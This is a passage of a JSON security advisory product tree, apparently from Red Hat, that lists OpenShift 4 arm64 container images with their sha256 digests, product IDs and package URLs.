"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3Addb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-aws-rhel9@sha256%3A60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557712"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-azure-rhel9@sha256%3A4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557306"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3Aeb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602000"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3Aeca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Adae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Aaa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3Ae605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Abb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3Acc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3Aa51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3A39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3A15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Af3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3Aab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3Aa40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3Ae838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"product_identification_helper": {
